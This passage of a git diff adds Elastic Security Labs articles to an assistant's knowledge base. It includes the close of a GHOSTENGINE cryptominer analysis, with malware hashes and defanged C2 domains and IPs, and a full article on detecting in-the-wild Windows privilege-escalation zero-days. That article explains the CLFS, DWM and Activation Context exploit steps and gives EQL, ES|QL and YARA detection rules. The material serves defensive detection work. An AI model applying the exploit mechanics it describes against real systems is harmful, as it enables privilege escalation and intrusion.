+* [Impact](https://attack.mitre.org/tactics/TA0040/)
+
+### Techniques
+
+Techniques represent how an adversary achieves a tactical goal by performing an action.
+
+* [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)
+* [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)
+* [Scheduled Task/Job: Scheduled Task](https://attack.mitre.org/techniques/T1053/005/)
+* [Indicator Removal: Clear Windows Event Logs](https://attack.mitre.org/techniques/T1070/001/)
+* [Masquerading](https://attack.mitre.org/techniques/T1036/)
+* [Process Injection](https://attack.mitre.org/techniques/T1055/)
+* [Process Discovery](https://attack.mitre.org/techniques/T1057/)
+* [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)
+* [Data Encoding](https://attack.mitre.org/techniques/T1132)
+* [Resource Hijacking](https://attack.mitre.org/techniques/T1496/)
+* [Service Stop](https://attack.mitre.org/techniques/T1489/)
+
+## Mitigating GHOSTENGINE
+
+### Detection
+
+The first objective of the GHOSTENGINE malware is to incapacitate endpoint security solutions and disable specific Windows event logs, such as Security and System logs,  which record process creation and service registration. Therefore, it is crucial to prioritize the detection and prevention of these initial actions:
+
+* Suspicious PowerShell execution
+* Execution from unusual directories
+* Elevating privileges to system integrity
+* Deploying vulnerable drivers and establishing associated kernel mode services.
+
+Once the vulnerable drivers are loaded, detection opportunities decrease significantly, and organizations must find compromised endpoints that stop transmitting logs to their SIEM.
+
+Network traffic may generate and be identifiable if DNS record lookups point to [known mining pool](https://miningpoolstats.stream/monero) domains over well-known ports such as HTTP (`80`) and HTTPS  (`443`). Stratum is also another popular network protocol for miners, by default, over port `4444`.
+
+The analysis of this intrusion set revealed the following detection rules and behavior prevention events:
+
+* [Suspicious PowerShell Downloads](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/execution_suspicious_powershell_downloads.toml)
+* [Service Control Spawned via Script Interpreter](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/privilege_escalation_service_control_spawned_script_int.toml)
+* [Local Scheduled Task Creation](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/persistence_local_scheduled_task_creation.toml)
+* [Process Execution from an Unusual Directory](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_from_unusual_directory.toml)
+* [Svchost spawning Cmd](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41)
+* [Unusual Parent-Child Relationship](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41)
+* [Clearing Windows Event Logs](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_clearing_windows_event_logs.toml)
+* [Microsoft Windows Defender Tampering](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_microsoft_defender_tampering.toml)
+* [Potential Privilege Escalation via Missing DLL](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/privilege_escalation_potential_privilege_escalation_via_missing_dll.toml)
+* [Binary Masquerading via Untrusted Path](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml#L58)
+
+### Prevention
+
+Malicious Files Prevention : 
+
+![GHOSTENGINE file prevention](/assets/images/invisible-miners-unveiling-ghostengine/image1.png "GHOSTENGINE file prevention")
+
+Shellcode Injection Prevention:
+    
+![GHOSTENGINE shellcode prevention](/assets/images/invisible-miners-unveiling-ghostengine/image14.png "GHOSTENGINE shellcode prevention")
+
+Vulnerable Drivers file creation prevention ([Windows.VulnDriver.ArPot](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar) and [Windows.VulnDriver.IoBitUnlocker](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar) )
+
+![GHOSTENGINE driver prevention](/assets/images/invisible-miners-unveiling-ghostengine/image15.png "GHOSTENGINE driver prevention")
+
+#### YARA
+
+Elastic Security has created YARA rules to identify this activity. 
+
+* [Windows Trojan GHOSTENGINE](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostEngine.yar)
+* [Windows.VulnDriver.ArPot](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar)
+* [Windows.VulnDriver.IoBitUnlocker](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar)
+
+## Observations
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ghostengine) in both ECS and STIX format.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type      | Name                                                        | Reference                          |
+|------------------------------------------------------------------|-----------|-------------------------------------------------------------|------------------------------------|
+| `2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753` | SHA-256   | `C:\Windows\Fonts\smartsscreen.exe`                           | GHOSTENGINE EDR controller module  |
+| `4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1` | SHA-256   | `C:\Windows\System32\drivers\aswArPots.sys`                   | Avast vulnerable driver            |
+| `2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae` | SHA-256   | `C:\Windows\System32\drivers\IObitUnlockers.sys`              | Iobit vulnerable driver            |
+| `3ced0552b9ecf3dfecd14cbcc3a0d246b10595d5048d7f0d4690e26ecccc1150` | SHA-256   | `C:\Windows\System32\oci.dll`                            | Update/Persistence module (64-bit)   |
+| `3b2724f3350cb5f017db361bd7aae49a8dbc6faa7506de6a4b8992ef3fd9d7ab` | SHA-256   | `C:\Windows\System32\oci.dll`                            | Update/Persistence module (32-bit)   |
+| `35eb368c14ad25e3b1c58579ebaeae71bdd8ef7f9ccecfc00474aa066b32a03f` | SHA-256   | `C:\Windows\Fonts\taskhostw.exe`                              | Miner client                       |
+| `786591953336594473d171e269c3617d7449876993b508daa9b96eedc12ea1ca` | SHA-256   | `C:\Windows\Fonts\config.json`                                | Miner configuration file           |
+| `11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5` | SHA-256   | `C:\Windows\Fonts\WinRing0x64.sys`                            | Miner driver                       |
+| `aac7f8e174ba66d62620bd07613bac1947f996bb96b9627b42910a1db3d3e22b` | SHA-256   | `C:\ProgramData\Microsoft\DeviceSync\SystemSync\Tiworker.exe` | Initial stager                     |
+| `6f3e913c93887a58e64da5070d96dc34d3265f456034446be89167584a0b347e` | SHA-256   | `backup.png`                                                  | GHOSTENGINE backdoor module        |
+| `7c242a08ee2dfd5da8a4c6bc86231985e2c26c7b9931ad0b3ea4723e49ceb1c1` | SHA-256   | `get.png`                                                     | GHOSTENGINE loader                 |
+| `cc4384510576131c126db3caca027c5d159d032d33ef90ef30db0daa2a0c4104` | SHA-256   | `kill.png`                                                    | GHOSTENGINE EDR termination module |
+| `download.yrnvtklot[.]com`                                         | domain    |                                                             | C2 server                          |
+| `111.90.158[.]40`                                                  | ipv4-addr |                                                             | C2 server                          |
+| `ftp.yrnvtklot[.]com`                                              | domain    |                                                             | C2 server                          |
+| `93.95.225[.]137`                                                  | ipv4-addr |                                                             | C2 server                          |
+| `online.yrnvtklot[.]com`                                           | domain    |                                                             | C2 server                          |
+
+## References
+
+The following were referenced throughout the above research:
+
+* https://www.antiy.com/response/HideShoveling.html
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/itw_windows_lpe_0days_insights_and_detection_strategies.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/itw_windows_lpe_0days_insights_and_detection_strategies.md
new file mode 100644
index 0000000000000..3a0ef112df819
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/itw_windows_lpe_0days_insights_and_detection_strategies.md
@@ -0,0 +1,312 @@
+---
+title: "In-the-Wild Windows LPE 0-days: Insights & Detection Strategies"
+slug: "itw-windows-lpe-0days-insights-and-detection-strategies"
+date: "2024-03-29"
+description: "This article will evaluate detection methods for Windows local privilege escalation techniques based on dynamic behaviors analysis using Elastic Defend features."
+author:
+  - slug: samir-bousseaden
+image: "image18.jpg"
+category:
+  - slug: security-operations
+tags:
+  - slug: windows
+---
+
+Based on disclosures from [Microsoft](https://msrc.microsoft.com/update-guide/vulnerability), [Google](https://googleprojectzero.github.io/0days-in-the-wild/rca.html), [Kaspersky](https://securelist.com/windows-clfs-exploits-ransomware/111560/), [Checkpoint](https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/), and other industry players, it has become apparent that in-the-wild Windows local privilege escalation (LPE) zero-days are increasingly prevalent and essential components in sophisticated cybercrime and APT arsenals. It is important for detection engineers to closely examine these publicly accessible samples and assess possible avenues for detection. 
+
+This article will not delve into the root cause or specific details of the vulnerabilities; however, we do provide links to appropriate vulnerability research articles. We will evaluate the detection methods based on dynamic behaviors analysis using [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) features.
+
+## Case 1 - Common Log File System
+
+[The Common Log File System (CLFS)](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/introduction-to-the-common-log-file-system) is a general-purpose logging service that can be used by software clients that need high-performance event logging. The [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/) reveals that more than 30 CLFS vulnerabilities have been patched since 2018, 5 of which were observed during 2023 in ransomware attacks. 2024 also started with a [vulnerability report](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20653) targeting the same CLFS driver (submitted by several researchers).
+
+You can find an excellent series of write-ups delving into the internals of CLFS exploits [here](https://securelist.com/windows-clfs-exploits-ransomware/111560/). 
+One thing that those exploits have in common is that they leverage a few ```clfsw32.dll``` APIs (```CreateLogFile``` and ```AddLogContainer```) to create and manipulate BLF logs, allowing them to write or corrupt a kernel mode address. Combined with other exploitation primitives, this can lead to a successful elevation.
+
+Based on the specifics of these vulnerabilities, a high-level detection can be designed to identify unusual processes. For example, a process running as low or medium integrity can create BLF files followed by unexpectedly performing a system integrity-level activity (spawning a system child process, API call, file, or registry manipulation with system privileges). 
+
+The following EQL query can be used to correlate Elastic Defend file events where the call stack contains reference of the user mode APIs ```CreateLogFile``` or ```AddLogContainerSet```, specifically when running as normal user followed by the creation of child process running as SYSTEM:
+
+```
+sequence with maxspan=5m
+ [file where event.action != "deletion" and not user.id : "S-1-5-18" and   user.id != null and 
+  _arraysearch(process.thread.Ext.call_stack, $entry, 
+               $entry.symbol_info: ("*clfsw32.dll!CreateLogFile*", "*clfsw32.dll!AddLogContainerSet*"))] by process.entity_id
+ [process where event.action == "start" and user.id : "S-1-5-18"] by process.parent.entity_id
+```
+
+The following example is of matches on CVE-2022-24521 where ```cmd.exe``` is started as SYSTEM:
+
+![CLFS LPE exploit detection](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image10.png)
+
+
+The following EQL query uses similar logic to the previous one, but instead of spawning a child process, it looks for API, file, or registry activity with SYSTEM privileges following the BLF file event:
+
+```
+sequence by process.entity_id 
+ [file where event.action != "deletion" and not user.id : "S-1-5-18" and user.id != null and 
+  _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info : ("*clfsw32.dll!CreateLogFile*", "*clfsw32.dll!AddLogContainerSet*"))]
+ [any where event.category : ("file", "registry", "api") and user.id : "S-1-5-18"]
+ until [process where event.action:"end"] 
+```
+
+The following screenshot matches the cleanup phase of artifacts after the CLFS exploit elevated permissions (file deletion with system privileges):
+
+![CLFS LPE exploit detection](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image11.png)
+
+
+In addition to the previous [two behavior detections](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts%20CLFS&type=code), we can also leverage YARA to hunt for unsigned PE files that import the user mode APIs ```CreateLogFile``` or ```AddLogContainerSet``` and an atypical number of functions from ```clfsw32.dll``` (normal CLFS clients programs would import more functions from the same DLL):
+
+```
+import "pe" 
+
+rule lpe_clfs_strings {
+    strings:
+     $s1 = "NtQuerySystemInformation"
+     $s2 = "clfs.sys" nocase
+    condition:
+     uint16(0)==0x5a4d and (pe.imports("clfsw32.dll", "CreateLogFile") or pe.imports("clfsw32.dll", "AddLogContainer")) and all of ($s*)
+}
+
+rule lpe_clfs_unsigned {
+    condition:
+     uint16(0)==0x5a4d and pe.number_of_signatures == 0 and filesize <= 200KB and 
+      (pe.imports("clfsw32.dll", "CreateLogFile") or pe.imports("clfsw32.dll", "AddLogContainer")) and 
+      not (pe.imports("clfsw32.dll", "ReadLogRecord") or pe.imports("clfsw32.dll", "CreateLogMarshallingArea"))
+}
+```
+
+Below is an example of a [VT match](https://www.virustotal.com/gui/file/afb715f9a6747b4ae74a7880b5a60eb236d205248b3a6689938e3b7ba6e703fa) using Elastic’s YARA rules for [CVE-2023-2825](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-28252):
+
+![YARA rule match for CVE-2023-2825](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image2.png)
+
+YARA rule match for CVE-2023-2825 
+
+## Case 2 - Windows DWM core library EoP
+
+Desktop Window Manager (```dwm.exe```) has been the compositing window manager in Microsoft Windows since Windows Vista. This program enables hardware acceleration to render the Windows graphical user interface and has high privileges; however, users with low privileges can interact with the DWM process, which significantly increases the attack surface. 
+
+Security researcher [Quan Jin](https://twitter.com/jq0904) reported an in-the-wild vulnerability exploit for [CVE-2023-36033](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36033), and a detailed [writeup](https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2023/CVE-2023-36033.html) explaining the exploit's stages was published later by Google Project Zero. 
+
+Based on our understanding, a DWM Core Library (```dwmcore.dll```) vulnerability exploit will most likely trigger shellcode execution in the ```dwm.exe``` process while running with Window Manager\DWM user privilege. Note that this is high integrity but not yet SYSTEM.  
+
+Detonating the ITW public sample on Elastic Defend indeed triggers a self-injection shellcode alert. Without prior knowledge and context, one may confuse it with a generic code injection alert or false positive since it’s a self-injection alert by a Microsoft trusted system binary with a normal parent process and no loaded malicious libraries. 
+
+The following KQL hunt can be used to find similar shellcode alerts: 
+
+```
+event.code : "shellcode_thread" and process.name : "dwm.exe" and user.name : DWM*
+```
+
+![Shellcode detection alert for CVE-2023-36033](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image6.png)
+
+
+Other than shellcode execution, we can also look for unusual activity in ```dwm.exe``` by baselining child processes and file activity. Below, we can see an example of ```dwm.exe``` spawning ```cmd.exe``` as a result of exploitation:
+
+![DWM spawning cmd.exe due to LPE exploit](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image12.png)
+
+
+Based on our telemetry visibility, ```dwm.exe``` rarely spawns legitimate child processes. The following [detection](https://github.com/elastic/protections-artifacts/blob/72fd8cad90189e9d145d22eb3d4fee2fe3d5902f/behavior/rules/privilege_escalation_unusual_desktop_window_manager_child_process.toml) can be used to find abnormal ones: 
+
+```
+process where event.action == "start" and
+ process.parent.executable : "?:\\Windows\\system32\\dwm.exe" and user.id : ("S-1-5-90-0-*", "S-1-5-18") and process.executable : "?:\\*" and 
+ not process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\Windows\\System32\\ISM.exe", "?:\\Windows\\system32\\dwm.exe")
+```
+
+![](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image8.png)
+
+To further elevate privileges from the Window Manager\DWM user to SYSTEM, the shellcode drops a DLL to disk and places a JMP hook on the ```kernelbase!MapViewOfFile``` calls within the ```dwm.exe``` process. It then triggers a logoff by executing the ```shutdown /l``` command. 
+
+The logoff action triggers the execution of the ```LogonUI.exe``` process, which runs as a SYSTEM user. The ```LogonUI.exe``` process will communicate with the Desktop Window Manager process similar to any desktop GUI process, which will marshal/unmarshal Direct Composition objects. 
+
+The ```MapViewOfFile``` hook inside ```dwm.exe``` monitors the mapped heap content. It modifies it with another set of crafted gadgets utilized to execute a ```LoadLibraryA``` call of the dropped DLL, when the resource heap data is unmarshalled within the ```LogonUI.exe``` process. 
+
+The two main detection points here occur when ```dwm.exe``` drops a PE file to disk and when ```LogonUI.exe``` loads a DLL, with the call stack pointing to ```dcomp.dll``` - an indicator of marshaling/unmarshaling Direct Composition objects. 
+
+Below is a KQL query that looks for ```dwm.exe``` by dropping a PE file to disk in both file events and malware alerts:
+
+```
+(event.category :"file" or event.code :"malicious_file") and 
+
+process.name :"dwm.exe" and user.id:S-1-5-90-0-* and 
+
+(file.extension :(dll or exe) or file.Ext.header_bytes :4d5a*) 
+```
+
+![DWM dropping reflective DLL to disk post exploit execution](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image5.png)
+
+
+Below is a [detection](https://github.com/elastic/endpoint-rules/blob/20833cbeaac4284ecf9818b44438bda4bc3cae18/rules/privilege_escalation_logonui_dcomp.toml) EQL query that looks for the LogonUI DLL load hijack: 
+
+```
+library where process.executable : "?:\\Windows\\System32\\LogonUI.exe" and 
+ user.id : "S-1-5-18" and 
+ not dll.code_signature.status : "trusted" and 
+ process.thread.Ext.call_stack_summary : "*combase.dll|dcomp.dll*"
+```
+
+![LogonUI.exe loading the DLL dropped by dwm.exe](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image1.png)
+
+
+## Case 3 - Windows Activation Context EoP
+
+[CVE-2022-41073](https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-41073.html) is another interesting in-the-wild vulnerability. The core vulnerability is that a user can remap the root drive (```C:\```) for privileged processes during impersonation. [This specific sample](https://www.virustotal.com/gui/file/e8a94466e64fb5f84eea5d8d1ba64054a61abf66fdf85ac160a95b204b7b19f3/details) tricks the ```printfilterpipelinesvc.exe``` process to load an arbitrary DLL by redirecting the ```C:\``` drive to ```C:\OneDriveRoot``` during the [Activation Context](https://learn.microsoft.com/en-us/windows/win32/sbscs/activation-contexts) generation in the client server runtime subsystem (CSRSS). It then masquerades as the ```C:\Windows\WinSxS``` directory and is not writable by unprivileged users.
+
+From a behavioral perspective, it falls under the category of loading a DLL by a SYSTEM integrity process that was dropped by a low/medium integrity process. There is also a mark of masquerading as the legitimate Windows WinSxS folder.
+
+The following EQL hunt can be used to find similar attempts to masquerade as trusted system folders for redirection: 
+
+```
+any where (event.category in ("file", "library") or event.code : "malicious_file") and 
+(
+  file.path : ("C:\\*\\Windows\\WinSxS\\*.dll", "C:\\*\\Windows\\system32\\*.dll", "C:\\*\\Windows\\syswow64\\*.dll", "C:\\*\\Windows\\assembly\\NativeImages*.dll") or 
+ 
+  dll.path : ("C:\\*\\Windows\\WinSxS\\*.dll", "C:\\*\\Windows\\system32\\*.dll", "C:\\*\\Windows\\syswow64\\*.dll", "C:\\*\\Windows\\assembly\\NativeImages*.dll")
+ )
+```
+
+![CVE-2022-41073 EoP attempt to Masquerade as trusted system folders](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image13.png)
+
+
+This also matches on [this](https://github.com/elastic/protections-artifacts/blob/72fd8cad90189e9d145d22eb3d4fee2fe3d5902f/behavior/rules/privilege_escalation_untrusted_dll_loaded_by_a_system_windows_process.toml) generic endpoint detection, which looks for untrusted modules loaded by elevated system native processes:
+
+![Alert - Untrusted DLL Loaded by a System Windows Process](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image14.png)
+
+
+## Generic Behavior Detection
+
+The examples provided above illustrate that each vulnerability possesses distinct characteristics. Exploitation methods vary depending on the flexibility of primitives, such as writing to an address, executing shellcode, loading an arbitrary DLL, or creating a file. Certain system components may harbor more vulnerabilities than others, warranting dedicated detection efforts (e.g., CLFS, win32k).
+
+Nevertheless, these vulnerabilities' ultimate objective and impact remain consistent. This underscores the opportunity to devise more effective detection strategies.
+
+Privilege escalation can manifest in various forms:
+ - A low/medium integrity process spawning an elevated child process
+ - A low/medium integrity process injecting code into an elevated process
+ - A system integrity process unexpectedly loads an untrusted DLL
+ - A system native process unexpectedly drops PE files
+ - A low/medium integrity process dropping files to system-protected folders
+  - A user-mode process writing to a kernel mode address
+
+Leveraging Elastic Defend’s capabilities, we can design detections and hunt for each of the  possibilities above.
+
+**Low/Medium integrity process spawning an elevated child process**:
+
+```
+sequence with maxspan=5m
+ [process where event.action == "start" and
+  process.Ext.token.integrity_level_name in ("medium", "low")] by process.entity_id
+ [process where event.action == "start" and
+  process.Ext.token.integrity_level_name == "system" and user.id : "S-1-5-18"] by process.parent.entity_id
+```
+
+Example of matches on a [sample](https://www.virustotal.com/gui/file/b17c0bdffa9086531e05677aad51252c6a883598109473fc2f4b4b8bfec8b6d3/) exploiting a vulnerable driver (Zemana `zam64.sys`) to spawn `cmd.exe` as SYSTEM: 
+
+![Detection for unusual parent child process integrity levels](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image3.png)
+
+
+**Low/medium integrity process injecting code into an elevated process**:
+
+Here is an [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) query to look for rare cross-process API calls: 
+
+```
+from logs-endpoint.events.api*
+| where process.Ext.token.integrity_level_name in ("medium", "low") and Target.process.Ext.token.integrity_level_name == "system" and
+ process.Ext.api.name in ("WriteProcessMemory", "VirtualProtect", "VirtualAllocEx", "VirtualProtectEx", "QueueUserAPC", "MapViewOfFile", "MapViewOfFileEx")
+| stats occurrences = count(*), agents = count_distinct(host.id) by process.Ext.api.name, process.executable, Target.process.executable
+| where agents == 1 and occurrences <= 100
+```
+
+When we run this query, we get LPE exploits injecting into ```winlogon.exe``` post-elevation via token swapping: 
+
+![Detection for cross-process injection from Medium IL to winlogon.exe running as SYSTEM](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image15.png)
+
+
+**System integrity process unexpectedly loads an untrusted DLL**
+
+Here’s an ES|QL query to look for rare unsigned DLLs that have been loaded by an elevated Microsoft binary: 
+
+```
+from logs-endpoint.events.library-*
+| where host.os.family == "windows" and event.action == "load" and
+  starts_with(process.code_signature.subject_name, "Microsoft") and        
+  user.id in ("S-1-5-18", "S-1-5-19", "S-1-5-20") and 
+  process.code_signature.status == "trusted" and 
+  dll.Ext.relative_file_creation_time <= 500 and
+  (dll.code_signature.exists == false or dll.code_signature.trusted == false) and   
+
+  /* excluding noisy DLL paths */   
+  not dll.path rlike """[C-F]:\\Windows\\(assembly|WinSxS|SoftwareDistribution|SystemTemp)\\.+\.dll""" and
+
+ /* excluding noisy processes and potentially unrelated to exploits - svchost must be covered by a dedicated hunt to exclude service dlls and COM */
+not process.name in ("rundll32.exe", "regsvr32.exe", "powershell.exe", "msiexec.exe", "svchost.exe", "w3wp.exe", "mscorsvw.exe", "OfficeClickToRun.exe", "SetupHost.exe", "UpData.exe", "DismHost.exe")
+
+| stats occurrences = count(*), host_count = count_distinct(host.id) by dll.name, process.name
+/* loaded once and the couple dll.name process.name are present in one agent across the fleet */
+| where occurrences == 1 and host_count == 1
+```
+
+![LogonUI loading malicious DLL via dcomp unmarshalling](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image9.png)
+
+
+**A system native process unexpectedly drops PE files**
+
+The following ES|QL query can be used to hunt for instances of a privileged Microsoft signed binary that has a low count of executable file creation history and is limited to one agent across the fleet of monitored hosts: 
+
+```
+from logs-endpoint.events.file-*
+| where  @timestamp > now() - 30 day
+| where host.os.family == "windows" and event.category == "file" and event.action == "creation" and user.id in ("S-1-5-18", "S-1-5-19", "S-1-5-20", "S-1-5-90-0-*") and
+ starts_with(file.Ext.header_bytes, "4d5a") and process.code_signature.status == "trusted" and
+ starts_with(process.code_signature.subject_name, "Microsoft") and 
+ process.executable rlike """[c-fC-F]:\\Windows\\(System32|SysWOW64)\\[a-zA-Z0-9_]+.exe""" and
+ not process.name in ("drvinst.exe", "MpSigStub.exe", "cmd.exe")
+| keep process.executable, host.id
+| stats occurrences = count(*), agents = count_distinct(host.id) by process.executable
+| where agents == 1 and occurrences == 1
+```
+
+![Unusual PE file creation by a SYSTEM process](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image4.png)
+
+
+**User-mode process writing to a kernel mode address**
+
+Corrupting [PreviousMode](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/previousmode) is a widely popular exploitation technique. Overwriting this one byte in the [KTHREAD](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ke/kthread/index.htm) structure bypasses kernel-mode checks inside syscalls such as ```NtReadVirtualMemory``` or ```NtWriteVirtualMemory```, allowing a user-mode attacker to read and write arbitrary kernel memory.
+
+On x64, the virtual address space is divided into the user mode addresses ranging from ```0x00000000 00000000``` - ```0x0000FFFF FFFFFFFF``` and the kernel mode address ranging from ```0xFFFF0000 00000000``` - ```0xFFFFFFFF FFFFFFFF```. The following EQL query can be used to detect API `NtReadVirtualMemory` or ```NtReadVirtualMemory``` calls where the target address is a kernel mode one, which is an abnormal behavior:
+
+```
+api where process.pid != 4 and process.Ext.api.name : "WriteProcessMemory"
+ and process.executable != null and 
+   /*  kernel mode address range - decimal */
+   process.Ext.api.parameters.address > 281474976710655
+```
+  
+Here is an example of these [alerts](https://github.com/elastic/endpoint-rules/blob/20833cbeaac4284ecf9818b44438bda4bc3cae18/rules/privilege_escalation_api_kernel_address_space.toml) triggering on exploits leveraging this primitive: 
+
+![Detection of PreviousMode abuse](/assets/images/itw-windows-lpe-0days-insights-and-detection-strategies/image7.png)
+
+
+## Conclusion
+
+Detecting elevation of privileges for specific vulnerabilities requires a deep understanding of the vulnerability and its exploitation methods, which is not common knowledge. Therefore, investing in generic behavioral detection mechanisms focusing on the exploit effect on the system and frequently used primitives like [KASLR bypass](https://github.com/waleedassar/RestrictedKernelLeaks), [token swapping](https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/how-kernel-exploits-abuse-tokens-for-privilege-escalation), [PreviousMode abuse](https://research.nccgroup.com/2020/05/25/cve-2018-8611-exploiting-windows-ktm-part-5-5-vulnerability-detection-and-a-better-read-write-primitive/#previousmode-abuse), and others proves more effective. However, for highly targeted Windows system components such as CLFS and win32k, dedicated detections are always valuable - ideally a combination of behavior and YARA.
+
+Despite the technical intricacies and the absence of logs for common primitives, the blue team should not disregard exploit and vulnerability research content; rather, they should endeavor to comprehend and apply it. Additionally, sharing via VirusTotal or similar in-the-wild LPE exploit samples with the defensive community will facilitate further the testing and enhancement of detection controls.
+
+Additional detection rules for [exploitation for privilege escalation](https://attack.mitre.org/techniques/T1068/) can be accessed [here](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1068%22&type=code&p=1).
+
+## References
+ - https://i.blackhat.com/USA-22/Thursday/us-22-Jin-The-Journey-Of-Hunting-ITW-Windows-LPE-0day-wp.pdf
+ - https://securelist.com/windows-clfs-exploits-ransomware/111560/
+ - https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part2-exploit-analysis
+ - https://googleprojectzero.github.io/0days-in-the-wild/rca.html
+ - https://conference.hitb.org/hitbsecconf2023ams/session/hunting-windows-desktop-window-manager-bugs/
+ - https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/
+
+
+
+
+
+
+
+
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/kernel_etw_best_etw.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/kernel_etw_best_etw.md
new file mode 100644
index 0000000000000..55f25e9c5add9
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/kernel_etw_best_etw.md
@@ -0,0 +1,178 @@
+---
+title: "Kernel ETW is the best ETW"
+slug: "kernel-etw-best-etw"
+date: "2024-09-13"
+description: "This research focuses on the importance of native audit logs in secure-by-design software, emphasizing the need for kernel-level ETW logging over user-mode hooks to enhance anti-tamper protections."
+author:
+  - slug: john-uhlmann
+image: "kernel-etw-best-etw.jpg"
+category:
+  - slug: perspectives
+tags:
+  - kernel
+  - ETW
+  - Windows
+  - OS
+---
+
+## Preamble
+
+A critical feature of secure-by-design software is the generation of audit logs when privileged operations are performed. These native audit logs can include details of the internal software state, which are impractical for third-party security vendors to bolt on after the fact.
+
+Most Windows components generate logs using [Event Tracing for Windows](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing) (ETW). These events expose some of Windows's inner workings, and there are scenarios when endpoint security products benefit from subscribing to them. For security purposes, though, not all ETW providers are created equal.
+
+The first consideration is typically the reliability of the event provider itself - in particular, where the logging happens. Is it within the client process and [trivially vulnerable to ETW tampering](https://twitter.com/dez_/status/938074904666271744)? Or is it perhaps slightly safer over in an RPC server process? Ideally, though, the telemetry will come from the [kernel](https://www.elastic.co/security-labs/doubling-down-etw-callstacks). Given the user-to-kernel security boundary, this provides stronger anti-tamper guarantees over in-process telemetry. This is Microsoft’s recommended approach. Like Elastic Endpoint, Microsoft Defender for Endpoint also uses kernel ETW in preference to fragile user-mode `ntdll` hooks.
+
